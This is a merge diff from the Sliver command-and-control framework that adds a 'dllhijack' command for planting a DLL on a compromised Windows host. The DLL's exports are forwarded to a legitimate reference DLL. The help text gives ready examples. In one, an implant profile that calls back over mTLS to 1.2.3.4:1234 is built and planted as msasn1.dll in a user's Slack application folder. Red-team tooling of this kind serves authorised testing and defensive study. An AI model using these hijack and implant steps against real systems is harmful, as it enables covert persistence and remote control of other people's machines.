Merge pull request #472 from BishopFox/dll-hijack

Add dllhijack command

client/command/commands.go

@@ -37,6 +37,7 @@ import (
 	"os"
 
 	"github.com/bishopfox/sliver/client/command/backdoor"
+	"github.com/bishopfox/sliver/client/command/dllhijack"
 	"github.com/bishopfox/sliver/client/command/environment"
 	"github.com/bishopfox/sliver/client/command/exec"
 	"github.com/bishopfox/sliver/client/command/extensions"
@@ -2136,4 +2137,30 @@ func BindCommands(con *console.SliverConsoleClient) {
 		HelpGroup: consts.GenericHelpGroup,
 	})
 	con.App.AddCommand(reactionCmd)
+
+	// [ DLL Hijack ] -----------------------------------------------------------------
+
+	dllhijackCmd := &grumble.Command{
+		Name:      consts.DLLHijackStr,
+		Help:      "Plant a DLL for a hijack scenario",
+		LongHelp:  help.GetHelpFor([]string{consts.DLLHijackStr}),
+		HelpGroup: consts.SliverWinHelpGroup,
+		Run: func(ctx *grumble.Context) error {
+			con.Println()
+			dllhijack.DllHijackCmd(ctx, con)
+			con.Println()
+			return nil
+		},
+		Args: func(a *grumble.Args) {
+			a.String("target-path", "Path to upload the DLL to on the remote system")
+		},
+		Flags: func(f *grumble.Flags) {
+			f.String("r", "reference-path", "", "Path to the reference DLL on the remote system")
+			f.String("R", "reference-file", "", "Path to the reference DLL on the local system")
+			f.String("f", "file", "", "Local path to the DLL to plant for the hijack")
+			f.String("p", "profile", "", "Profile name to use as a base DLL")
+			f.Int("t", "timeout", defaultTimeout, "command timeout in seconds")
+		},
+	}
+	con.App.AddCommand(dllhijackCmd)
 }

client/command/dllhijack/README.md

@@ -0,0 +1,4 @@
+DLL Hijack
+===========
+
+Implements command related to `dllhijack`.

client/command/dllhijack/dllhijack.go

@@ -0,0 +1,97 @@
+package dllhijack
+
+/*
+	Sliver Implant Framework
+	Copyright (C) 2021  Bishop Fox
+
+	This program is free software: you can redistribute it and/or modify
+	it under the terms of the GNU General Public License as published by
+	the Free Software Foundation, either version 3 of the License, or
+	(at your option) any later version.
+
+	This program is distributed in the hope that it will be useful,
+	but WITHOUT ANY WARRANTY; without even the implied warranty of
+	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+	GNU General Public License for more details.
+
+	You should have received a copy of the GNU General Public License
+	along with this program.  If not, see <https://www.gnu.org/licenses/>.
+*/
+
+import (
+	"context"
+	"fmt"
+	"io/ioutil"
+
+	"github.com/bishopfox/sliver/client/console"
+	"github.com/bishopfox/sliver/protobuf/sliverpb"
+	"github.com/desertbit/grumble"
+)
+
+// dllhijack --ref-path c:\windows\system32\msasn1.dll --file /tmp/runner.dll TARGET_PATH
+// dllhijack --ref-path c:\windows\system32\msasn1.dll --profile dll  TARGET_PATH
+// dllhijack --ref-path c:\windows\system32\msasn1.dll --ref-file /tmp/ref.dll --profile dll  TARGET_PATH
+
+// DllHijackCmd -- implements the dllhijack command
+func DllHijackCmd(ctx *grumble.Context, con *console.SliverConsoleClient) {
+	var (
+		localRefData  []byte
+		targetDLLData []byte
+		err           error
+	)
+	session := con.ActiveSession.GetInteractive()
+	if session == nil {
+		return
+	}
+
+	targetPath := ctx.Args.String("target-path")
+	referencePath := ctx.Flags.String("reference-path")
+	localFile := ctx.Flags.String("file")
+	profileName := ctx.Flags.String("profile")
+	localReferenceFilePath := ctx.Flags.String("reference-file")
+
+	if referencePath == "" {
+		con.PrintErrorf("Please provide a path to the reference DLL on the target system\n")
+		return
+	}
+
+	if localReferenceFilePath != "" {
+		localRefData, err = ioutil.ReadFile(localReferenceFilePath)
+		if err != nil {
+			con.PrintErrorf("Could not load the reference file from the client: %s\n", err)
+			return
+		}
+	}
+
+	if localFile != "" {
+		if profileName != "" {
+			con.PrintErrorf("please use either --profile or --File")
+			return
+		}
+		targetDLLData, err = ioutil.ReadFile(localFile)
+		if err != nil {
+			con.PrintErrorf("Error: %s\n", err)
+			return
+		}
+	}
+
+	ctrl := make(chan bool)
+	msg := fmt.Sprintf("Crafting and planting DLL at %s ...", targetPath)
+	con.SpinUntil(msg, ctrl)
+	_, err = con.Rpc.HijackDLL(context.Background(), &sliverpb.DllHijackReq{
+		ReferenceDLLPath: referencePath,
+		TargetLocation:   targetPath,
+		ReferenceDLL:     localRefData,
+		TargetDLL:        targetDLLData,
+		Request:          con.ActiveSession.Request(ctx),
+		ProfileName:      profileName,
+	})
+	ctrl <- true
+	<-ctrl
+	if err != nil {
+		con.PrintErrorf("Error: %s\n", err)
+		return
+	}
+
+	con.PrintInfof("DLL uploaded to %s\n", targetPath)
+}

client/command/help/long-help.go

@@ -88,6 +88,7 @@ var (
 		consts.WgPortFwdStr:                 wgPortFwdHelp,
 		consts.WgSocksStr:                   wgSocksHelp,
 		consts.SSHStr:                       sshHelp,
+		consts.DLLHijackStr:                 dllHijackHelp,
 
 		// Loot
 		consts.LootStr: lootHelp,
@@ -608,6 +609,24 @@ reaction set
 [[.Bold]]Examples:[[.Normal]]
 # Remove a reaction
 reaction unset --id 1
+`
+	dllHijackHelp = `[[.Bold]]Command:[[.Normal]] dllhijack
+[[.Bold]]About:[[.Normal]] Prepare and plant a DLL on the remote system for a hijack scenario.
+The planted DLL will have its export directory modified to forward the exports to a reference DLL
+on the remote system.
+The DLL used for the hijack can either be a file on the operator's system or built from a Sliver profile,
+supplied with the --profile flag.
+
+[[.Bold]]Examples:[[.Normal]]
+# Use a local DLL for a hijack
+dllhijack --reference-path c:\\windows\\system32\\msasn1.dll --file /tmp/blah.dll c:\\users\\bob\\appdata\\slack\\app-4.18.0\\msasn1.dll
+
+# Use a Sliver generated DLL for the hijack
+new-profile --format shared --mtls 1.2.3.4:1234 --profile-name dll
+dllhijack --reference-path c:\\windows\\system32\\msasn1.dll --profile dll c:\\users\\bob\\appdata\\slack\\app-4.18.0\\msasn1.dll
+
+# Use a local DLL as the reference DLL
+dllhijack --reference-path c:\\windows\\system32\\msasn1.dll --reference-file /tmp/msasn1.dll.orig --profile dll c:\\users\\bob\\appdata\\slack\\app-4.18.0\\msasn1.dll
 `
 )
 

client/constants/constants.go

@@ -199,6 +199,7 @@ const (
 	WgPortFwdStr          = "wg-portfwd"
 	MonitorStr            = "monitor"
 	SSHStr                = "ssh"
+	DLLHijackStr          = "dllhijack"
 
 	PortfwdStr = "portfwd"
 

go.mod

@@ -8,7 +8,7 @@ replace golang.zx2c4.com/wireguard => golang.zx2c4.com/wireguard v0.0.0-20210311
 require (
 	github.com/AlecAivazis/survey/v2 v2.2.2
 	github.com/Binject/binjection v0.0.0-20200705191933-da1a50d7013d
-	github.com/Binject/debug v0.0.0-20210225042342-c9b8b45728d2
+	github.com/Binject/debug v0.0.0-20210312092933-6277045c2fdf
 	github.com/BurntSushi/xgb v0.0.0-20201008132610-5f9e7b3c49cd // indirect
 	github.com/Microsoft/go-winio v0.4.16 // indirect
 	github.com/alecthomas/chroma v0.8.1

go.sum

@@ -19,6 +19,8 @@ github.com/Binject/binjection v0.0.0-20200705191933-da1a50d7013d/go.mod h1:rJLtH
 github.com/Binject/debug v0.0.0-20200621050044-63af8e405111/go.mod h1:6WgJ7mEG7ngJkNwwDkEVreDk2dPGg3oqdI6OEWaeDNg=
 github.com/Binject/debug v0.0.0-20210225042342-c9b8b45728d2 h1:8kQNJC9AxAaNs0JkXnWUfbNeDnIO1QLYYWjYqC6JEE4=
 github.com/Binject/debug v0.0.0-20210225042342-c9b8b45728d2/go.mod h1:QzgxDLY/qdKlvnbnb65eqTedhvQPbaSP2NqIbcuKvsQ=
+github.com/Binject/debug v0.0.0-20210312092933-6277045c2fdf h1:Cx4YJvjPZD91xiffqJOq8l3j1YKcvx3+8duqq7DX9gY=
+github.com/Binject/debug v0.0.0-20210312092933-6277045c2fdf/go.mod h1:QzgxDLY/qdKlvnbnb65eqTedhvQPbaSP2NqIbcuKvsQ=
 github.com/Binject/shellcode v0.0.0-20191101084904-a8a90e7d4563 h1:T8z8Wz/fqaPPANF8Unv4LjWLoa0TAvsjYAsRpvSkOqs=
 github.com/Binject/shellcode v0.0.0-20191101084904-a8a90e7d4563/go.mod h1:HMbzsKPz1sF7H4Hmeovh+d2PH2iKPYpAB4XMOVz8wmM=
 github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU=

protobuf/clientpb/client.proto

@@ -366,7 +366,6 @@ message MigrateReq {
   commonpb.Request Request = 9;
 }
 
-
 // [ Tunnels ] ----------------------------------------
 message CreateTunnelReq {